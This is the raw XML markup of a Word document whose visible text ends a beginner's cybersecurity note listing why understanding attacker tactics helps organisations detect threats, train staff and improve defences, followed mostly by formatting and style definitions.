    <w:p w14:paraId="7876E295" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>By understanding these tactics, techniques, and procedures (TTPs), organizations can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF735B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Detect threats faster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E591C0A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Train their employees better</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B956508" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Improve incident response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D519CA1" w14:textId="2CA557CF" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Set stronger technical defen</w:t>
      </w:r>
      <w:r w:rsidR="001D5AD4">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF29338" w14:textId="3B7EA53D" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Even if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as am</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> new to cybersecurity, learning these basics </w:t>
      </w:r>
      <w:r>
        <w:t>help to build</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> the foundation to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>think like an attacker and defend like a professional</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8A69F" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRDefault="00D60AEC"/>
    <w:sectPr w:rsidR="00D60AEC" w:rsidSect="00041292">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1276" w:right="1440"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81036"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15920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DB5056"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7160D9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DF7A76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4DE2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2565103"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3856A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6AE7DBE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B40B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F47434"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6040E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CBF3D0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71847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A35B5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C48CD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E3E0EB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5574C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13D165C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3A24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1FE6F60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="212E3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8E301C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6181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4EA673C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EAC2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BA6F07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61846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72D1813"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79C28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AA41C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9C463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6A2C9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25349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5B285D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43429E9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5303AE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5386CC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57472E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6767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8817C3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76B2E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DD97543"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF6E3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FE96FCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFC27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37E4DA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8960B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A9548D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B90C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E703259"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94E81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FF74DD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9998D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65346C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54746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AC26059"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3A81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AEA584D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D6E5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B224808"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4740E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E381C15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32985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557568C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEC8C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59C2B5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F4A1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60167C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDFEC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AB718B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CAE0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BE43F83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E5EF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C935DB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="762E2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D1847D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="449A1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F9E35B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58FE6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6462808">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1566722558">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1586301896">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="884214497">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1325471543">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="146282775">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2001108229">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="432479905">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="152457069">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1520466679">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1481271306">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="189299332">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1873036356">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1013609383">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1575354386">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1829175691">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="877744106">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="457068942">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1109204486">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1099062984">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1780761227">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1219979019">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1473214846">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1263608900">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1932811490">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="2035377346">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="342368403">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1132672222">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="419331425">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1909881973">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="510804632">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1405450074">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="2117097614">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1020546596">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="266500240">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1928734766">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1401558087">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1151213703">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1915629433">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="606929921">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AEC"/>
    <w:rsid w:val="00041292"/>
    <w:rsid w:val="001B7DD6"/>
    <w:rsid w:val="001D5AD4"/>
    <w:rsid w:val="0039086F"/>
    <w:rsid w:val="003F7A07"/>
    <w:rsid w:val="00501A9C"/>
    <w:rsid w:val="00AB41A4"/>
    <w:rsid w:val="00D60AEC"/>
    <w:rsid w:val="00D627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C01CB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CA1B1BB4-EA01-4D14-AAE6-230AC3424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0AE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60AE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60AE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60AE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60AE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60A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0A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0A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0A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0AE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60AE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60AE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60AE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60AE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60A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0A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0A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0AEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D60A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0A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0A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0A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0AEC"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D60AEC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D60AEC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D60AEC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D60AE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60AEC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D60AE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375037">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1753621664">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="654651972">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="592855558">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="145170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09364">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="975451701">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="604847286">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1850485596">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="479469760">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="532763971">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="112330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160909">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="958877511">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1306199202">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1437991056">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1486387154">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="114330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497482">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2107075510">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1056899430">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1988362883">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="604924882">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="104498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493266">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1653482581">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1758475494">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="919876292">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1507286841">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1729453204">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="62616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450478">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1373456263">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1892885430">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="539391833">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2109153990">
                  <w:marLeft w:val="0"/>
